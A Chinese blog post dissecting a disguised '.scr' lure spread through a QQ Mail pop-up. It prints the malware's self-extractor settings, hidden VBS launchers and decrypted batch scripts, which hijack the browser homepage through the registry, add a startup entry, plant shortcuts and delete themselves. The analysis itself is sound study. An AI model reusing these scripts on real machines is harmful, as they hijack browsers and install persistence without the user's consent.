刚刚QQ右下角弹出一个QQ邮箱的小纸条，标题为：20美女大学生，日夜不停求包养。如下图：

这个肯定有猫腻！点进去看了下，我就知道一定是病毒了。打算把它下载下来玩玩，看我的回复：

OK，很快就下载好了，是个RAR的压缩包，解压一下，出来的是一个JPG图标的文件，文件名为“性感的我.scr”。嘿，我倒要看看你有多“性感”！

这种调虫小技早就过时了！改成exe文件然后用winrar打开，病毒文件都出来了！解压到一个文件夹，好，我们开始慢慢“解剖”。

对了，首先看一下自解压的注释，如下：

Path=C:\WINDOWS\system32
SavePath
Setup=C:\WINDOWS\system32\1.vbs
Silent=1
Overwrite=1
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=s, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://www.52520qq.cn/, “”, “我爱我爱你QQ”, “我爱我爱你QQ”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://vod.wx00.com/, “”, “电影院”, “电影院”
Shortcut=D, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=S, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://mp3.wx00.com/, “”, “音乐大全”, “音乐大全”
Shortcut=P, “C:\Program Files\Internet Explorer\IEXPLORE.EXE” http://BBS.wx00.com/, “”, “互动交流”, “互动交流”

很简单的东西不用我多解释了吧？首先释放到System32，然后运行1.vbs，最后建立恶意的IE快捷方式。好，先打开1.vbs看看里面写了什么：

Set ws = CreateObject(“Wscript.Shell”)
ws.run “run.bat”,vbhide
ws.run “comman.bat”,vbhide
ws.run “2.jpg”,vbhide

运行两个批处理和一个图片。我猜这张一定是美女图片了，打开瞧瞧，是不是真的性感（啊呀，发现自己还真有点色……）：

Oh, my God！Is she sexy？？wo yun……

好了，继续。第一个运行的是run.bat，打开看看，惨不忍睹的一大堆！我不添代码了，直接截个图：

乱七八糟的什么东西啊？如果你关注我以前写的技术文章，你就不会问我是什么东西了。bat加密了！！一看就是用编码转换加的密。如果你关注我以前写的技术文章，你也不会问我怎么解密了。解出来就清楚了，解密之后的代码我贴一下：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run” /v “Explorer” /d “c:\windows\system32\Explorer.vbs” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main” /v “Default_Page_URL” /d “http://www.fwwz.net” /f
@reg add “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main” /v “Start Page” /d “http://www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOrganization” /d “www.fwwz.net” /f
@reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion” /v “RegisteredOwner” /d “服务网络” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
start /min IEXPLORE.EXE http://www.52520qq.cn/?w
start /min IEXPLORE.EXE http://bbs.wx00.com.cn/?w
del %0

这段代码在干什么呢？

一、强制把www.fwwz.net设置为主页并添加IE快捷方式hao661.com/?6到桌面；
二、把Explorer.vbs加为启动项；
三、打开www.52520qq.cn和bbs.wx00.com.cn两个网站；
四、删除自己。

再来看一下comman.bat写了什么东西，打开一看和run.bat一样也加了密：

解密之后：

cls
@reg add “HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command” /v “” /d “\”C:\Program Files\Internet Explorer\IEXPLORE.EXE\” http://www.fwwz.net/” /f
echo [InternetShortcut] >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo URL=”hao661.com/?6″ >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconIndex=0 >>”%USERPROFILE%\桌面\Internet Explorer.url”
echo IconFile=”C:\Program Files\Internet Explorer\IEXPLORE.EXE” >>”%USERPROFILE%\桌面\Internet Explorer.url”
ECHO 处于关闭状态。

和上面一样的东西嘛！真不知道作者在搞什么。

只剩下一个Explorer.vbs了，打开一看，唉…太让我失望了。。
Set ws = CreateObject(“Wscript.Shell”)
ws.run “comman.bat”,vbhide

一点都不好玩！！！

最后我们愚弄他一下吧！